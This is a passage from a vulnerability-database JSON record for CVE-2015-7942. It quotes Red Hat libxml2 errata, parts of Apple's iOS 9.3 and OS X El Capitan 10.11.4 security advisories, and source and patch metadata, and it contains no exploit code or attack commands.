Enterprise Linux Client (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7_2.2.src.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-python-2.9.1-6.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-static-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-static-2.9.1-6.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7_2.2.src.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-python-2.9.1-6.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-static-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-static-2.9.1-6.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7_2.2.src.rpm\n\naarch64:\nlibxml2-2.9.1-6.el7_2.2.aarch64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.aarch64.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.aarch64.rpm\nlibxml2-python-2.9.1-6.el7_2.2.aarch64.rpm\n\nppc64:\nlibxml2-2.9.1-6.el7_2.2.ppc.rpm\nlibxml2-2.9.1-6.el7_2.2.ppc64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.ppc.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.ppc64.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.ppc.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.ppc64.rpm\nlibxml2-python-2.9.1-6.el7_2.2.ppc64.rpm\n\nppc64le:\nlibxml2-2.9.1-6.el7_2.2.ppc64le.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.ppc64le.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.ppc64le.rpm\nlibxml2-python-2.9.1-6.el7_2.2.ppc64le.rpm\n\ns390x:\nlibxml2-2.9.1-6.el7_2.2.s390.rpm\nlibxml2-2.9.1-6.el7_2.2.s390x.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.s390.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.s390x.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.s390.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.s390x.rpm\nlibxml2-python-2.9.1-6.el7_2.2.s390x.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-python-2.9.1-6.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\naarch64:\nlibxml2-debuginfo-2.9.1-6.el7_2.2.aarch64.rpm\nlibxml2-static-2.9.1-6.el7_2.2.aarch64.rpm\n\nppc64:\nlibxml2-debuginfo-2.9.1-6.el7_2.2.ppc.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.ppc64.rpm\nlibxml2-static-2.9.1-6.el7_2.2.ppc.rpm\nlibxml2-static-2.9.1-6.el7_2.2.ppc64.rpm\n\nppc64le:\nlibxml2-debuginfo-2.9.1-6.el7_2.2.ppc64le.rpm\nlibxml2-static-2.9.1-6.el7_2.2.ppc64le.rpm\n\ns390x:\nlibxml2-debuginfo-2.9.1-6.el7_2.2.s390.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.s390x.rpm\nlibxml2-static-2.9.1-6.el7_2.2.s390.rpm\nlibxml2-static-2.9.1-6.el7_2.2.s390x.rpm\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-static-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-static-2.9.1-6.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nlibxml2-2.9.1-6.el7_2.2.src.rpm\n\nx86_64:\nlibxml2-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-devel-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-python-2.9.1-6.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nlibxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm\nlibxml2-static-2.9.1-6.el7_2.2.i686.rpm\nlibxml2-static-2.9.1-6.el7_2.2.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-1819\nhttps://access.redhat.com/security/cve/CVE-2015-5312\nhttps://access.redhat.com/security/cve/CVE-2015-7497\nhttps://access.redhat.com/security/cve/CVE-2015-7498\nhttps://access.redhat.com/security/cve/CVE-2015-7499\nhttps://access.redhat.com/security/cve/CVE-2015-7500\nhttps://access.redhat.com/security/cve/CVE-2015-7941\nhttps://access.redhat.com/security/cve/CVE-2015-7942\nhttps://access.redhat.com/security/cve/CVE-2015-8241\nhttps://access.redhat.com/security/cve/CVE-2015-8242\nhttps://access.redhat.com/security/cve/CVE-2015-8317\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFWZZK6XlSAg2UNWIIRAlx5AKCfIxP9TLM+V/vmQq6MVeUpjiGltgCgnOgZ\nIOmptwborGrgz5fLqra3STg=\n=bVgd\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \nCVE-ID\nCVE-2016-1781 : Devdatta Akhawe of Dropbox, Inc. \n\nWebKit\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A website may be able to track sensitive user information\nDescription: A hidden web page may be able to access device-\norientation and device-motion data. This issue was addressed by\nsuspending the availability of this data when the web view is hidden. \nCVE-ID\nCVE-2016-1780 : Maryam Mehrnezhad, Ehsan Toreini, Siamak F. \nShahandashti, and Feng Hao of the School of Computing Science,\nNewcastle University, UK\n\nWebKit\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Visiting a maliciously crafted website may reveal a user\u0027s\ncurrent location\nDescription: An issue existed in the parsing of geolocation\nrequests. \nCVE-ID\nCVE-2016-1779 : xisigr of Tencent\u0027s Xuanwu Lab\n(http://www.tencent.com)\n\nWebKit\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A malicious website may be able to access restricted ports\non arbitrary servers\nDescription: A port redirection issue was addressed through\nadditional port validation. \nCVE-ID\nCVE-2016-1782 : Muneaki Nishimura (nishimunea) of Recruit\nTechnologies Co.,Ltd. \nCVE-ID\nCVE-2016-1784 : Moony Li and Jack Tang of TrendMicro and \u674e\u666e\u541b of\n\u65e0\u58f0\u4fe1\u606f\u6280\u672fPKAV Team (PKAV.net)\n\nWebKit Page Loading\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Visiting a malicious website may lead to user interface\nspoofing\nDescription: Redirect responses may have allowed a malicious website\nto display an arbitrary URL and read cached contents of the\ndestination origin. \nCVE-ID\nCVE-2016-1786 : ma.la of LINE Corporation\n\nWebKit Page Loading\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A malicious website may exfiltrate data cross-origin\nDescription: A caching issue existed with character encoding. \nCVE-ID\nCVE-2016-0801 : an anonymous researcher\nCVE-2016-0802 : an anonymous researcher\n\nInstallation note:\n\nThis update is available through iTunes and Software Update on your\niOS device, and will not appear in your computer\u0027s Software Update\napplication, or in the Apple Downloads site. Make sure you have an\nInternet connection and have installed the latest version of iTunes\nfrom www.apple.com/itunes/\n\niTunes and Software Update on the device will automatically check\nApple\u0027s update server on its weekly schedule. When an update is\ndetected, it is downloaded and the option to be installed is\npresented to the user when the iOS device is docked. We recommend\napplying the update immediately if possible. Selecting Don\u0027t Install\nwill present the option the next time you connect your iOS device. \n\nThe automatic update process may take up to a week depending on the\nday that iTunes or the device checks for updates. You may manually\nobtain the update via the Check for Updates button within iTunes, or\nthe Software Update on your device. \n\nTo check that the iPhone, iPod touch, or iPad has been updated:\n\n* Navigate to Settings\n* Select General\n* Select About. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2016-03-21-5 OS X El Capitan 10.11.4 and Security Update\n2016-002\n\nOS X El Capitan 10.11.4 and Security Update 2016-002 is now available\nand addresses the following:\n\napache_mod_php\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted .png file may lead to\narbitrary code execution\nDescription: Multiple vulnerabilities existed in libpng versions\nprior to 1.6.20. These were addressed by updating libpng to version\n1.6.20. \nCVE-ID\nCVE-2015-8126 : Adam Mari\u0161\nCVE-2015-8472 : Adam Mari\u0161\n\nAppleRAID\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1733 : Proteas of Qihoo 360 Nirvan Team\n\nAppleRAID\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A local user may be able to determine kernel memory layout\nDescription: An out-of-bounds read issue existed that led to the\ndisclosure of kernel memory. This was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1732 : Proteas of Qihoo 360 Nirvan Team\n\nAppleUSBNetworking\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue existed in the parsing of\ndata from USB devices. This issue was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1734 : Andrea Barisani and Andrej Rosano of Inverse Path\n\nBluetooth\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1735 : Jeonghoon Shin@A.D.D\nCVE-2016-1736 : beist and ABH of BoB\n\nCarbon\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted .dfont file may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues existed in the\nhandling of font files. These issues were addressed through improved\nbounds checking. \nCVE-ID\nCVE-2016-1737 : an anonymous researcher\n\ndyld\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An attacker may tamper with code-signed applications to\nexecute arbitrary code in the application\u0027s context\nDescription: A code signing verification issue existed in dyld. This\nissue was addressed with improved validation. \nCVE-ID\nCVE-2016-1738 : beist and ABH of BoB\n\nFontParser\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Opening a maliciously crafted PDF file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2016-1740 : HappilyCoded (ant4g0nist and r3dsm0k3) working with\nTrend Micro\u0027s Zero Day Initiative (ZDI)\n\nHTTPProtocol\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple vulnerabilities existed in nghttp2 versions\nprior to 1.6.0, the most serious of which may have led to remote code\nexecution. These were addressed by updating nghttp2 to version 1.6.0. \nCVE-ID\nCVE-2015-8659\n\nIntel Graphics Driver\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1743 : Piotr Bania of Cisco Talos\nCVE-2016-1744 : Ian Beer of Google Project Zero\n\nIOFireWireFamily\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A local user may be able to cause a denial of service\nDescription: A null pointer dereference was addressed through\nimproved validation. \nCVE-ID\nCVE-2016-1745 : sweetchip of Grayhash\n\nIOGraphics\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1746 : Peter Pi of Trend Micro working with Trend Micro\u0027s\nZero Day Initiative (ZDI)\nCVE-2016-1747 : Juwei Lin of Trend Micro working with Trend Micro\u0027s\nZero Day Initiative (ZDI)\n\nIOHIDFamily\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to determine kernel memory layout\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2016-1748 : Brandon Azad\n\nIOUSBFamily\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1749 : Ian Beer of Google Project Zero and Juwei Lin of\nTrend Micro working with Trend Micro\u0027s Zero Day Initiative (ZDI)\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A use after free issue was addressed through improved\nmemory management. \nCVE-ID\nCVE-2016-1750 : CESG\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A race condition existed during the creation of new\nprocesses. This was addressed through improved state handling. \nCVE-ID\nCVE-2016-1757 : Ian Beer of Google Project Zero and Pedro Vilaca\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A null pointer dereference was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1756 : Lufeng Li of Qihoo 360 Vulcan Team\n\nKernel\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1754 : Lufeng Li of Qihoo 360 Vulcan Team\nCVE-2016-1755 : Ian Beer of Google Project Zero\nCVE-2016-1759 : lokihardt\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to determine kernel memory layout\nDescription: An out-of-bounds read issue existed that led to the\ndisclosure of kernel memory. This was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1758 : Brandon Azad\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple integer overflows were addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1753 : Juwei Lin Trend Micro working with Trend Micro\u0027s Zero\nDay Initiative (ZDI)\n\nKernel\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to cause a denial of service\nDescription: A denial of service issue was addressed through\nimproved validation. \nCVE-ID\nCVE-2016-1752 : CESG\n\nlibxml2\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: Processing maliciously crafted XML may lead to unexpected\napplication termination or arbitrary code execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2015-1819\nCVE-2015-5312 : David Drysdale of Google\nCVE-2015-7499\nCVE-2015-7500 : Kostya Serebryany of Google\nCVE-2015-7942 : Kostya Serebryany of Google\nCVE-2015-8035 : gustavo.grieco\nCVE-2015-8242 : Hugh Davenport\nCVE-2016-1761 : wol0xff working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\nCVE-2016-1762\n\nMessages\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An attacker who is able to bypass Apple\u0027s certificate\npinning, intercept TLS connections, inject messages, and record\nencrypted attachment-type messages may be able to read attachments\nDescription: A cryptographic issue was addressed by rejecting\nduplicate messages on the client. \nCVE-ID\nCVE-2016-1788 : Christina Garman, Matthew Green, Gabriel Kaptchuk,\nIan Miers, and Michael Rushanan of Johns Hopkins University\n\nMessages\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Clicking a JavaScript link can reveal sensitive user\ninformation\nDescription: An issue existed in the processing of JavaScript links. \nThis issue was addressed through improved content security policy\nchecks. \nCVE-ID\nCVE-2016-1764 : Matthew Bryan of the Uber Security Team (formerly of\nBishop Fox), Joe DeMesy and Shubham Shah of Bishop Fox\n\nNVIDIA Graphics Drivers\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1741 : Ian Beer of Google Project Zero\n\nOpenSSH\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: Connecting to a server may leak sensitive user information,\nsuch as a client\u0027s private keys\nDescription: Roaming, which was on by default in the OpenSSH client,\nexposed an information leak and a buffer overflow. These issues were\naddressed by disabling roaming in the client. \nCVE-ID\nCVE-2016-0777 : Qualys\nCVE-2016-0778 : Qualys\n\nOpenSSH\nAvailable for: OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5\nImpact: Multiple vulnerabilities in LibreSSL\nDescription: Multiple vulnerabilities existed in LibreSSL versions\nprior to 2.1.8. These were addressed by updating LibreSSL to version\n2.1.8. \nCVE-ID\nCVE-2015-5333 : Qualys\nCVE-2015-5334 : Qualys\n\nOpenSSL\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A remote attacker may be able to cause a denial of service\nDescription: A memory leak existed in OpenSSL versions prior to\n0.9.8zh. This issue was addressed by updating OpenSSL to version\n0.9.8zh. \nCVE-ID\nCVE-2015-3195\n\nPython\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted .png file may lead to\narbitrary code execution\nDescription: Multiple vulnerabilities existed in libpng versions\nprior to 1.6.20. These were addressed by updating libpng to version\n1.6.20. \nCVE-ID\nCVE-2014-9495\nCVE-2015-0973\nCVE-2015-8126 : Adam Mari\u0161\nCVE-2015-8472 : Adam Mari\u0161\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted FlashPix Bitmap Image may\nlead to unexpected application termination or arbitrary code\nexecution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1767 : Francis Provencher from COSIG\nCVE-2016-1768 : Francis Provencher from COSIG\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted Photoshop document may lead\nto unexpected application termination or arbitrary code execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1769 : Francis Provencher from COSIG\n\nReminders\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Clicking a tel link can make a call without prompting the\nuser\nDescription: A user was not prompted before invoking a call. This\nwas addressed through improved entitlement checks. \nCVE-ID\nCVE-2016-1770 : Guillaume Ross of Rapid7 and Laurent Chouinard of\nLaurent.ca\n\nRuby\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A local attacker may be able to cause unexpected application\ntermination or arbitrary code execution\nDescription: An unsafe tainted string usage vulnerability existed in\nversions prior to 2.0.0-p648. This issue was addressed by updating to\nversion 2.0.0-p648. \nCVE-ID\nCVE-2015-7551\n\nSecurity\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: A local user may be able to check for the existence of\narbitrary files\nDescription: A permissions issue existed in code signing tools. This\nwas addressed though additional ownership checks. \nCVE-ID\nCVE-2016-1773 : Mark Mentovai of Google Inc. \n\nSecurity\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted certificate may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the ASN.1 decoder. \nThis issue was addressed through improved input validation. \nCVE-ID\nCVE-2016-1950 : Francis Gabriel of Quarkslab\n\nTcl\nAvailable for: \nOS X Yosemite v10.10.5 and OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted .png file may lead to\narbitrary code execution\nDescription: Multiple vulnerabilities existed in libpng versions\nprior to 1.6.20. These were addressed by removing libpng. \nCVE-ID\nCVE-2015-8126 : Adam Mari\u0161\n\nTrueTypeScaler\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the processing of\nfont files. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2016-1775 : 0x1byte working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\n\nWi-Fi\nAvailable for: OS X El Capitan v10.11 to v10.11.3\nImpact: An attacker with a privileged network position may be able\nto execute arbitrary code\nDescription: A frame validation and memory corruption issue existed\nfor a given ethertype. This issue was addressed through additional\nethertype validation and improved memory handling. \nCVE-ID\nCVE-2016-0801 : an anonymous researcher\nCVE-2016-0802 : an anonymous researcher\n\nOS X El Capitan 10.11.4 includes the security content of Safari 9.1. \nhttps://support.apple.com/kb/HT206171\n\nOS X El Capitan v10.11.4 and Security Update 2016-002 may be obtained\nfrom the Mac App Store or Apple\u0027s Software Downloads web site:\nhttp://www.apple.com/support/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\nComment: GPGTools - https://gpgtools.org\n\niQIcBAEBCgAGBQJW8JQFAAoJEBcWfLTuOo7tZSYP/1bHFA1qemkD37uu7nYpk/q6\nARVsPgME1I1+5tOxX0TQJgzMBmdQsKYdsTiLpDk5HTuv+dAMsFfasaUItGk8Sz1w\nHiYjSfVsxL+Pjz3vK8/4/fsi2lX6472MElRw8gudITOhXtniGcKo/vuA5dB+vM3l\nJy1NLHHhZ6BD2t0bBmlz41mZMG3AMxal2wfqE+5LkjUwASzcvC/3B1sh7Fntwyau\n/71vIgMQ5AaETdgQJAuQivxPyTlFduBRgLjqvPiB9eSK4Ctu5t/hErFIrP2NiDCi\nUhfZC48XbiRjJfkUsUD/5TIKnI+jkZxOnch9ny32dw2kUIkbIAbqufTkzsMXOpng\nO+rI93Ni7nfzgI3EkI2bq+C+arOoRiveWuJvc3SMPD5RQHo4NCQVs0ekQJKNHF78\njuPnY29n8WMjwLS6Zfm+bH+n8ELIXrmmEscRztK2efa9S7vJe+AgIxx7JE/f8OHF\ni9K7UQBXFXcpMjXi1aTby/IUnpL5Ny4NVwYwIhctj0Mf6wTH7uf/FMWYIQOXcIfP\nIzo+GXxNeLd4H2ypZ+UpkZg/Sn2mtCd88wLc96+owlZPBlSqWl3X1wTlp8i5FP2X\nqlQ7RcTHJDv8jPT/MOfzxEK1n/azp45ahHA0o6nohUdxlA7PLci9vPiJxqKPo/0q\nVZmOKa8qMxB1L/JmdCqy\n=mZR+\n-----END PGP SIGNATURE-----\n", "sources": [ { "db": "NVD", "id": "CVE-2015-7942" }, { "db": "JVNDB", "id": "JVNDB-2015-005979" }, { "db": "BID", "id": "79507" }, { "db": "VULHUB", "id": "VHN-85903" }, { "db": "VULMON", "id": "CVE-2015-7942" }, { "db": "PACKETSTORM", "id": "137101" }, { "db": "PACKETSTORM", "id": "135395" }, { "db": "PACKETSTORM", "id": "140533" }, { "db": "PACKETSTORM", "id": "135045" }, { "db": "PACKETSTORM", "id": "134655" }, { "db": "PACKETSTORM", "id": "136342" }, { "db": "PACKETSTORM", "id": "136346" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2015-7942", "trust": 3.6 }, { "db": "BID", "id": "79507", "trust": 2.1 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2015/10/22/8", "trust": 1.8 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2015/10/22/5", "trust": 1.8 }, { "db": "SECTRACK", "id": "1034243", "trust": 1.8 }, { "db": "JVN", "id": "JVNVU97668313", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2015-005979", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201511-296", "trust": 0.7 }, { "db": "AUSCERT", "id": "ESB-2023.3732", "trust": 0.6 }, { "db": "VULHUB", "id": "VHN-85903", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2015-7942", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "137101", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135395", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "140533", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135045", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134655", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136342", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136346", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-85903" }, { "db": "VULMON", "id": "CVE-2015-7942" }, { "db": "BID", "id": "79507" }, { "db": "JVNDB", "id": "JVNDB-2015-005979" }, { "db": "PACKETSTORM", "id": "137101" }, { "db": "PACKETSTORM", "id": "135395" }, { "db": "PACKETSTORM", "id": "140533" }, { "db": "PACKETSTORM", "id": "135045" }, { "db": "PACKETSTORM", "id": "134655" }, { "db": "PACKETSTORM", "id": "136342" }, { "db": "PACKETSTORM", "id": "136346" }, { "db": "CNNVD", "id": "CNNVD-201511-296" }, { "db": "NVD", "id": "CVE-2015-7942" } ] }, "id": "VAR-201511-0037", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-85903" } ], "trust": 0.01 }, "last_update_date": "2024-07-23T20:10:29.538000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "APPLE-SA-2016-03-21-1 iOS 9.3", "trust": 0.8, "url": "http://lists.apple.com/archives/security-announce/2016/mar/msg00000.html" }, { "title": "APPLE-SA-2016-03-21-2 watchOS 2.2", "trust": 0.8, "url": "http://lists.apple.com/archives/security-announce/2016/mar/msg00001.html" }, { "title": "APPLE-SA-2016-03-21-3 tvOS 9.2", "trust": 0.8, "url": "http://lists.apple.com/archives/security-announce/2016/mar/msg00002.html" }, { "title": "APPLE-SA-2016-03-21-5 OS X El Capitan 10.11.4 and Security Update 2016-002", "trust": 0.8, "url": "http://lists.apple.com/archives/security-announce/2016/mar/msg00004.html" }, { "title": "HT206167", "trust": 0.8, "url": "https://support.apple.com/en-us/ht206167" }, { "title": "HT206168", "trust": 0.8, "url": "https://support.apple.com/en-us/ht206168" }, { "title": "HT206169", "trust": 0.8, "url": "https://support.apple.com/en-us/ht206169" }, { "title": "HT206166", "trust": 0.8, "url": "https://support.apple.com/en-us/ht206166" }, { "title": "HT206166", "trust": 0.8, "url": "https://support.apple.com/ja-jp/ht206166" }, { "title": "HT206167", "trust": 0.8, "url": "https://support.apple.com/ja-jp/ht206167" }, { "title": "HT206168", "trust": 0.8, "url": "https://support.apple.com/ja-jp/ht206168" }, { "title": 